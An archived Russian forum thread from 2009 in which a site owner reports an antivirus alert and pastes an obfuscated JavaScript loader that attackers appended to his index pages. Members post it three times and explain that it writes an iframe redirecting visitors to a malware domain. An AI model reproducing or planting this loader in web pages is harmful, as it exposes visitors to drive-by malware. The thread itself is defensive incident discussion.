Архив форума сайта «Живая Этика в мире» (2006 − 2013)
ВОЗМОЖНО ТОЛЬКО ЧТЕНИЕ
 
 СайтСайт   ПоискПоиск   ПользователиПользователи   ГруппыГруппы   РегистрацияРегистрация 
  ПрофильПрофиль    Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 

Внимание: Троянская программа на lebendige-ethik.net

 
Начать новую тему   Ответить на тему    Список форумов Архив форума сайта «Живая Этика в мире» (2006 − 2013) -> Обсуждение статей сайта
Предыдущая тема :: Следующая тема  
Автор Сообщение
Серёжик



Зарегистрирован: 11.06.2009
Сообщения: 11
Откуда: Германия
Группы: Нет

СообщениеДобавлено: 24-08-2009, 23:12    Заголовок сообщения: Внимание: Троянская программа на lebendige-ethik.net Ответить с цитатой

HEUR: Trojan.Script.Iframer


Trojan.Script.Ifraer.jpg
 Описание:
HEUR: Trojan.Script.Iframer
 Размер:  24,67 KB
 Просмотрено:  4974 раз(а)

Trojan.Script.Ifraer.jpg


Вернуться к началу
Вне форума
Andrej



Зарегистрирован: 28.11.2006
Сообщения: 7658
Откуда: Deutschland
Группы: Нет

СообщениеДобавлено: 25-08-2009, 02:58    Заголовок сообщения: Ответить с цитатой

Да, действительно, какой-то хакер влез на index и подписал в конце кода свой скрипт:

Код:
<script>function B68BB6b68b686bb8B88b88Bb6bBBBb6bB88bb6B6
(bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8){var b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B=
bB8b8666bbBB6B868666B6Bbb68886866
BbbBBB8.length,bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB
8688B=1024,bB6b6886
88Bb66b6666B66bBb88bBbbBbB8b6bbb,Bb86BB8BBbBBb8B6
B6BbBb888b6b8b6888b66666,b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6,bb68bbbBBB6bB68b8bBbB8bB688668
88BbBb68b6=0,BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8=0,bbBB666668686b
88B66B8bB666BB6B6BbBbb6BB8=0,bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB8
66=Array(63,46,40,56,55,21,32,16,31,20,0,0,0,0,0,0,47,57,6,58,12,23,35,44,3,18,4,17,9,41,4
2,38,49,61,5,43,39,8,52,62,14,28,50,0,0,0,0,59,0,24,34,53,22,19,33,30,7,2,10,0,13,29,54,45,
26,25,60,51,15,27,1,36,48,11,37);for(Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666
=Math.ceil(b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B/bBbBbbbBbb86b88BBB
BB6B6BB6bBbBBBBbB8688B);Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666>0;
Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666—
){b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6='';           
for(bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb=Math.min(b8BbBBbbBbbbbbBb86
688BB68bb66866bBBbBb8B,bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB8688B);bB
6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb>0;bB6b688688Bb66b6666B66bBb88bBb
bBbB8b6bbb--,b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B—
){bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8|=(bBb886B86B6bbBBBBBbBbBb
6b8BB6b66bbbBB866[bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8.charCodeAt(b
b68bbbBBB6bB68b8bBbB8bB68866888BbBb68b6++)-
48])<<BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8;if(BBB6B6B6bbBb6888BB86
6b8688bbB6b6B86bbBB8){b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6+=String.f
romCharCode(134^bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8&255);bbBB6666
68686b88B66B8bB666BB6B6BbBbb6BB8>>=8;BBB6B6B6bbBb6888BB866b8688bbB6b
6B86bbBB8-
=2}else{BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8=6}}document.write(b6b668
BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6)}}B68BB6b68b686bb8B88b88Bb6bBBBb6b
B88bb6B6("CWX3V8WCFupQVEW1wC1rZut@MOp3VTW_sytNzFgNcTC_2FpAf0g14p
yMOB0_by@__INowpN_F0g31y01wpyMOd@r0SW3_IN3@E@QN8W0rbgC2tXM3NuN
@HXQT@W33i")       
</script>


Как я понял из форума касперского, такой же вирус был на супермощном сайте американской газеты New York Times. Также понял, что этот вирус безвредный. Если кто-то сможет объяснить, для чего этот вирус и откуда он взялся, буду благодарен. Конечно, я перегрузил index и теперь сайт www.lebendige-ethik.net чист.
Вернуться к началу
Вне форума
rodnoy



Зарегистрирован: 06.03.2007
Сообщения: 251
Откуда: Планета Земля
Группы: Нет

СообщениеДобавлено: 25-08-2009, 05:55    Заголовок сообщения: Ответить с цитатой

Andrej писал(а):
Также понял, что этот вирус безвредный. Если кто-то сможет объяснить, для чего этот вирус и откуда он взялся, буду благодарен. Конечно, я перегрузил index и теперь сайт www.lebendige-ethik.net чист.

перенаправляет на сайты с вирусами, используя тэг "iframe"...
в данном случае это домен "groiut.cn"...
(вот инфа с malwareurl.com)

САРВА МАНГАЛАМ! Smile
Вернуться к началу
Вне форума
Andrej



Зарегистрирован: 28.11.2006
Сообщения: 7658
Откуда: Deutschland
Группы: Нет

СообщениеДобавлено: 25-08-2009, 21:57    Заголовок сообщения: Ответить с цитатой

rodnoy писал(а):
перенаправляет на сайты с вирусами, используя тэг "iframe"...
в данном случае это домен "groiut.cn"...
(вот инфа с malwareurl.com)

А из чего Вы сделали такой вывод? И каким образом, по Вашему, хакеры могли проникнуть на сервер, где находится мой сайт, и дописать свой скрипт в index?
Вернуться к началу
Вне форума
rodnoy



Зарегистрирован: 06.03.2007
Сообщения: 251
Откуда: Планета Земля
Группы: Нет

СообщениеДобавлено: 25-08-2009, 23:00    Заголовок сообщения: Ответить с цитатой

Andrej писал(а):
А из чего Вы сделали такой вывод? И каким образом, по Вашему, хакеры могли проникнуть на сервер, где находится мой сайт, и дописать свой скрипт в index?

для этого нужно этот скрипт запустить на выполнение, но обязательно(!) модифицировав в определенных местах (дабы он не сделал никаких request-ов)... я не опубликовал полный url (по соображениям безопасности окружающих), но могу Вам его переслать в личную почту (хотя это, скорее всего, мало что даст)...

как его смогли туда подцепить - понятия не имею (это не моя область)... но с беспелатными хостингами (если у Вас таковой) такое случается очень и очень часто...

САРВА МАНГАЛАМ! Smile
Вернуться к началу
Вне форума
Andrej



Зарегистрирован: 28.11.2006
Сообщения: 7658
Откуда: Deutschland
Группы: Нет

СообщениеДобавлено: 26-08-2009, 01:21    Заголовок сообщения: Ответить с цитатой

rodnoy писал(а):
...как его смогли туда подцепить - понятия не имею (это не моя область)... но с беспелатными хостингами (если у Вас таковой) такое случается очень и очень часто...


Нет, хостинг не бесплатный. Меня интересует, хакер взламывал мой логин или сервека?
Вернуться к началу
Вне форума
Ziatz



Зарегистрирован: 01.12.2006
Сообщения: 2212
Откуда: Москва
Группы: Нет

СообщениеДобавлено: 26-08-2009, 09:40    Заголовок сообщения: Ответить с цитатой

Сказать трудно, но что-то из этого он точно взломал.
Если известны другие сайты, находящиеся на этом хостинге, стоит проверить и их. Помнится, аналогичная проблема примерно год назад была с библиотекой "Урусвати".

P.S. Сейчас зашёл туда, в конце обнаружил непонятный код:


Цитата:

function B68BB6b68b686bb8B88b88Bb6bBBBb6bB88bb6B6(bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8)
{var b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B=bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8.length,
bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB8688B=1024,bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb,
Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666,b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6,bb68bbb
BBB6bB68b8bBbB8bB68866888BbBb68b6=0,BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8=0,bbBB66666
8686b88B66B8bB666BB6B6BbBbb6BB8=0,bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB866=Array(63,46,40,
56,55,21,32,16,31,20,0,0,0,0,0,0,47,57,6,58,12,23,35,44,3,18,4,17,9,41,42,38,49,61,5,43,39,8,52,62,14,28,50,0,0,0,
0,59,0,24,34,53,22,19,33,30,7,2,10,0,13,29,54,45,26,25,60,51,15,27,1,36,48,11,37);for(Bb86BB8BBbBBb8B6B6BbB
b888b6b8b6888b66666=Math.ceil(b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B/bBbBbbbBbb86b88BBBBB6
B6BB6bBbBBBBbB8688B);Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666>0;Bb86BB8BBbBBb8B6B6BbBb88
8b6b8b6888b66666--){b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6='';
for(bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb=Math.min(b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B,
bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB8688B);bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb>0;bB6b688
688Bb66b6666B66bBb88bBbbBbB8b6bbb--,b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B--){bbBB666668686b88
B66B8bB666BB6B6BbBbb6BB8|=(bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB866[bB8b8666bbBB6B868666B6Bb
b68886866BbbBBB8.charCodeAt(bb68bbbBBB6bB68b8bBbB8bB68866888BbBb68b6++)-48])<<BBB6B6B6bbBb6888B
B866b8688bbB6b6B86bbBB8;if(BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8){b6b668BB6bBB8b66B6BBb668B
b6b68bbb8bbBbb6+=String.fromCharCode(134^bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8&255);bbBB666668
686b88B66B8bB666BB6B6BbBbb6BB8>>=8;BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8-=2}else{BBB6B6B6b
bBb6888BB866b8688bbB6b6B86bbBB8=6}}document.write(b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6)}}B68B
B6b68b686bb8B88b88Bb6bBBBb6bB88bb6B6("CWX3V8WCFupQVEW1wC1rZut@MOp3VTW_sytNzFgNcTC_2FpAf0g
14pyMOB0_by@__INowpN_F0g31y01wpyMOd@r0SW3_
IN3@E@QN8W0rbgC2tXM3NuN@HXQT@W33i")

По-моему, то же самое.
Вернуться к началу
Вне форума
Andrej



Зарегистрирован: 28.11.2006
Сообщения: 7658
Откуда: Deutschland
Группы: Нет

СообщениеДобавлено: 26-08-2009, 11:34    Заголовок сообщения: Ответить с цитатой

Ziatz писал(а):
P.S. Сейчас зашёл туда, в конце обнаружил непонятный код:
...
По-моему, то же самое.


Да, абсолютно одинаковый скрипт. Похоже, что все мои сайты атакует один и тот же хакер. Как с этим бороться?

P.S. Перезагрузил index, который был изменён без моего ведома 21.08.2009. Сайт http://urusvati.agni-age.net снова чист.
Вернуться к началу
Вне форума
Andrej



Зарегистрирован: 28.11.2006
Сообщения: 7658
Откуда: Deutschland
Группы: Нет

СообщениеДобавлено: 26-08-2009, 11:37    Заголовок сообщения: Ответить с цитатой

Ziatz писал(а):
Сказать трудно, но что-то из этого он точно взломал.
Если известны другие сайты, находящиеся на этом хостинге, стоит проверить и их.


Как определить, какие ещё сайты висят на сервере, где находится и мой сайт? Где в Интернете видел сайты, с которых можно сделать такое определение. Не помнишь, где?
Вернуться к началу
Вне форума
Ziatz



Зарегистрирован: 01.12.2006
Сообщения: 2212
Откуда: Москва
Группы: Нет

СообщениеДобавлено: 26-08-2009, 14:21    Заголовок сообщения: Ответить с цитатой

Не помню. Конечно, каждый отдельно взятый сайт можно проверить на принадлежность к провайдеру, но вот наоборот... Некоторые провайдеры делают каталог, типа у нас хостятся: ...
Но это скорее исключение, чем правило.

Полагаю, кто-то действительно заражает определённые сайты.
Например, agni-age.net и grani.agni-age.net не заражены.
Вернуться к началу
Вне форума
Andrej



Зарегистрирован: 28.11.2006
Сообщения: 7658
Откуда: Deutschland
Группы: Нет

СообщениеДобавлено: 26-08-2009, 22:19    Заголовок сообщения: Ответить с цитатой

Ziatz писал(а):
Полагаю, кто-то действительно заражает определённые сайты. Например, agni-age.net и grani.agni-age.net не заражены.


Ну, значит, мои враги натравили на меня хакеров, чтобы они внедрили вредоносный скрипт на мои сайты. Для посетителей тут нет никакой угрозы, т.к. они не перенаправляются автоматически никуда, но поисковые машины меня не индексируют и ставят мои сайты в чёрный список, а некоторые антивирусные программы, типа выше показанной проги касперского, не пускают на мой сайт, говоря, что там мол атака. В результате посещаемость сайта снижается.

Как бороться с этими хакерскими атаками? Каждый день контролировать файлы?
Вернуться к началу
Вне форума
Ziatz



Зарегистрирован: 01.12.2006
Сообщения: 2212
Откуда: Москва
Группы: Нет

СообщениеДобавлено: 26-08-2009, 22:37    Заголовок сообщения: Ответить с цитатой

Пока да, а вообще надо известить провайдера, что сайты периодически взламываются.
Вернуться к началу
Вне форума
Andrej



Зарегистрирован: 28.11.2006
Сообщения: 7658
Откуда: Deutschland
Группы: Нет

СообщениеДобавлено: 26-08-2009, 22:39    Заголовок сообщения: Ответить с цитатой

Ziatz писал(а):
Пока да, а вообще надо известить провайдера, что сайты периодически взламываются.


Сайт Библ. Урусвати у Джуры. Он говорил, что хакеры взламывали сайты, пользуясь общедоступной статистикой. Он вынужден был её закрыть.

Конечно, буду жаловаться провайдеру.
Вернуться к началу
Вне форума
Андрей Пузиков



Зарегистрирован: 12.03.2007
Сообщения: 1361
Откуда: Калининград
Группы: Нет

СообщениеДобавлено: 27-08-2009, 00:23    Заголовок сообщения: Ответить с цитатой

У разных провайдеров разная защита от взлома площадок клиентов.
Хороший провайдер такого не допустит.

Кстати, скрипт может приписывать и программа-конструктор, в которой верстается сайт, если она сама заражена вирусом.
Вернуться к началу
Скрыт
Andrej



Зарегистрирован: 28.11.2006
Сообщения: 7658
Откуда: Deutschland
Группы: Нет

СообщениеДобавлено: 27-08-2009, 00:48    Заголовок сообщения: Ответить с цитатой

Андрей Пузиков писал(а):
Кстати, скрипт может приписывать и программа-конструктор, в которой верстается сайт, если она сама заражена вирусом.


Я пишу HTML сам.
Вернуться к началу
Вне форума
Андрей Пузиков



Зарегистрирован: 12.03.2007
Сообщения: 1361
Откуда: Калининград
Группы: Нет

СообщениеДобавлено: 27-08-2009, 01:05    Заголовок сообщения: Ответить с цитатой

Тогда надо менять пароль доступа с логином, а может и провайдера.
Вернуться к началу
Скрыт
Д.И.В.



Зарегистрирован: 02.09.2008
Сообщения: 1140
Откуда: Украина
Группы: Нет

СообщениеДобавлено: 29-08-2009, 09:00    Заголовок сообщения: Ответить с цитатой

Andrej писал(а):


Да, абсолютно одинаковый скрипт. Похоже, что все мои сайты атакует один и тот же хакер. Как с этим бороться?


Лучше всего - найти и отбить голову. И так, чтоб другая не выросла.
Вернуться к началу
Вне форума
Andrej



Зарегистрирован: 28.11.2006
Сообщения: 7658
Откуда: Deutschland
Группы: Нет

СообщениеДобавлено: 02-10-2009, 16:05    Заголовок сообщения: Ответить с цитатой

Тот же самый скрипт обнаружился на www.emrism.agni-age.net

Код:
<script>function

B68BB6b68b686bb8B88b88Bb6bBBBb6bB88bb6B6(bB8b8666bbBB6

B868666B6Bbb68886866BbbBBB8){var

b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B=bB8b8666bbBB

6B868666B6Bbb68886866BbbBBB8.length,bBbBbbbBbb86b88BBBB

B6B6BB6bBbBBBBbB8688B=1024,bB6b688688Bb66b6666B66bBb8

8bBbbBbB8b6bbb,Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b6666

6,b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6,bb68bbbBBB6b

B68b8bBbB8bB68866888BbBb68b6=0,BBB6B6B6bbBb6888BB866b8

688bbB6b6B86bbBB8=0,bbBB666668686b88B66B8bB666BB6B6BbB

bb6BB8=0,bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB866=Array

(63,46,40,56,55,21,32,16,31,20,0,0,0,0,0,0,47,57,6,58,12,23,35,44,3,

18,4,17,9,41,42,38,49,61,5,43,39,8,52,62,14,28,50,0,0,0,0,59,0,24,34

,53,22,19,33,30,7,2,10,0,13,29,54,45,26,25,60,51,15,27,1,36,48,11,37


);for(Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666=Math.ceil(b8

BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B/bBbBbbbBbb86b88B

BBBB6B6BB6bBbBBBBbB8688B);Bb86BB8BBbBBb8B6B6BbBb888b6b

8b6888b66666>0;Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666--)

{b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6='';           

for(bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb=Math.min(b8Bb

BBbbBbbbbbBb86688BB68bb66866bBBbBb8B,bBbBbbbBbb86b88BBB

BB6B6BB6bBbBBBBbB8688B);bB6b688688Bb66b6666B66bBb88bBbb

BbB8b6bbb>0;bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb--,b8

BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B--)

{bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8|=

(bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB866[bB8b8666bbBB

6B868666B6Bbb68886866BbbBBB8.charCodeAt(bb68bbbBBB6bB68b

8bBbB8bB68866888BbBb68b6++)-48])

<<BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8;if(BBB6B6B6b

bBb6888BB866b8688bbB6b6B86bbBB8)

{b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6+=String.fromC

harCode(134^bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8&2

55);bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8>>=8;

BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8-=2}else{BBB6B

6B6bbBb6888BB866b8688bbB6b6B86bbBB8=6}}document.write(b6

b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6)}}B68BB6b68b686

bb8B88b88Bb6bBBBb6bB88bb6B6("CWX3V8WCFupQVEW1wC1rZut

@MOp3VTW_sytNzFgNcTC_2FpAf0g14pyMOB0_by@__INowpN_F0g3

1y01wpyMOd@r0SW3_IN3@E@QN8W0rbgC2tXM3NuN@HXQT@W33i")   
   

</script>



virusg.jpg
 Описание:
 Размер:  31,8 KB
 Просмотрено:  4493 раз(а)

virusg.jpg


Вернуться к началу
Вне форума
Показать сообщения:   
Начать новую тему   Ответить на тему    Список форумов Архив форума сайта «Живая Этика в мире» (2006 − 2013) -> Обсуждение статей сайта Часовой пояс: GMT + 3
Страница 1 из 1

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете вкладывать файлы
Вы можете скачивать файлы


© копирайт на все материалы форума свободный